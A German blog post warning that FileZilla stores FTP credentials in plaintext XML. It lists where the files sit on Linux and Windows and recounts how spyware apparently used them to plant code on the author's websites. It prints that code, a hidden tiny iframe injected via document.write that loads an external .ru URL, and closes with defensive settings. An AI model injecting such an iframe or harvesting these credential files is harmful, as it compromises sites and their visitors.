Filezilla speichert Passwörter in Klartext

Einleitung

Wie viele andere Sysadmins nutze ich Filezilla um meine Webseiten per FTP zu verwalten. Als ich dieses Jahr plötzlich schädlichen Code auf beinahe jeder von mir verwalteten Website entdeckte konnte ich mir dies zuerst nicht erklären. Anfangs entdeckte ich den Code nur auf einer der Webseiten und dachte dieser sei vielleicht durch eine Schwachstelle im veralteten WordPress auf die Seite gelangt. Doch als ich merkte dass auch die anderen Seiten betroffen waren bekam ich einen schrecklichen Verdacht: die Malware konnte eigentlich nur von mir kommen!

So änderte ich natürlich zuerstmal sofort alle FTP Passwörter und scannte meinen ganzen Computer nach Spyware und Viren. Allerdings musste ich 2-3 Tage später feststellen, dass der Code wieder auf meinen Seiten erschienen war.

Durch googeln fand ich dann die Quelle des Übels. Wie es aussah hatte ich die Spyware nicht entfernen können (was ich nun unterdessen durch eine Neuinstallation von Windows lösen musste). Diese konnte wohl meine gespeicherten Servermanager-Einträge auslesen und so auf alle Webserver zugreifen.

Der entdeckte Schadcode

Anbei der Schadcode welcher in meinen Files erschien. Meistens war dies in HTML Files, in einem Fall jedoch fand ich es in einem jquery File welches ich includete. Die URL war bei jedem Vorfall wieder eine andere.


document.write("<iframe src="http://orangeroller.ru/in.cgi?16" name="Twitter"
scrolling="auto” frameborder="no” align="center” height="2″ width="2..

Wo speichert Filezilla die Passwörter?

Je nach Betriebsystem sind die XML Dateien welche die Passwörter enthalten in einem anderen Verzeichnis:

Linux: /home/username/.filezilla/
Windows XP: C:Documents and SettingsusernameApplication DataFileZilla
Windows Vista / 7: C:UsersusernameAppDataRoamingFileZilla

Wer sich die Dateien anschaut wird erschrecken. Sämtliche über die Quick-Connect Leiste gemachten Verbindungen sowie alle gespeicherten Servermanager Einträge sind in diesen Files mit IP, Username und Passwort vorhanden.
Somit ist es ein leichtes für ein schädliches Programm oder Skript die Datei zu scannen, auf die einzelnen Server zu connecten und irgendetwas dummes anzustellen.

Wieso werden die Passwörter nicht verschlüsselt?

Ihr fragt euch jetzt bestimmt wieso Filezilla diese Passwörter nicht verschlüsselt abspeichert. Mir geht es genauso. Die Diskussionen in den Foren gehen auseinander. Einige meinen es bringe nichts die Passwörter zu verschlüsseln da sie im FTP Protokoll so oder so unverschlüsselt übertragen werden. Andere finden es fahrlässig von Filezilla und sind – wie ich – erschrocken als sie diese Tatsache erfahren haben.
Filezilla gab als Statement ab, dass dies kein Bug sei, sondern so gewollt.
Trotzdem gibt es Bugzilla Einträge die auf eine Behebung des Problems pochen:

    Wie halte ich Filezilla davon ab Passwörter zu speichern?

    Wer Filezilla trotzdem weiterverwenden will anstatt zu einer Alternative zu wechseln, der hat eigentlich nur folgende Möglichkeiten um mit ruhigem Puls und gutem Gewissen weiter zu arbeiten:

    • Quickconnect-Leiste nicht mehr benutzen (wird in recentconnections gespeichert)
    • Servermanager Einträge als „Interaktiv“ oder „Nach Passwort fragen“ speichern. Bei allen anderen Varianten werden die Passwörter im XML gespeichert.

    Grundsätzlich könnte man sagen: Speichere niemals ein FTP Passwort im Client wenn du nicht 100% sicher bist, dass es nicht irgendwo in einer Datei landet!

    weitere Infos

    2 Gedanken zu „Filezilla speichert Passwörter in Klartext“

    Leave a Reply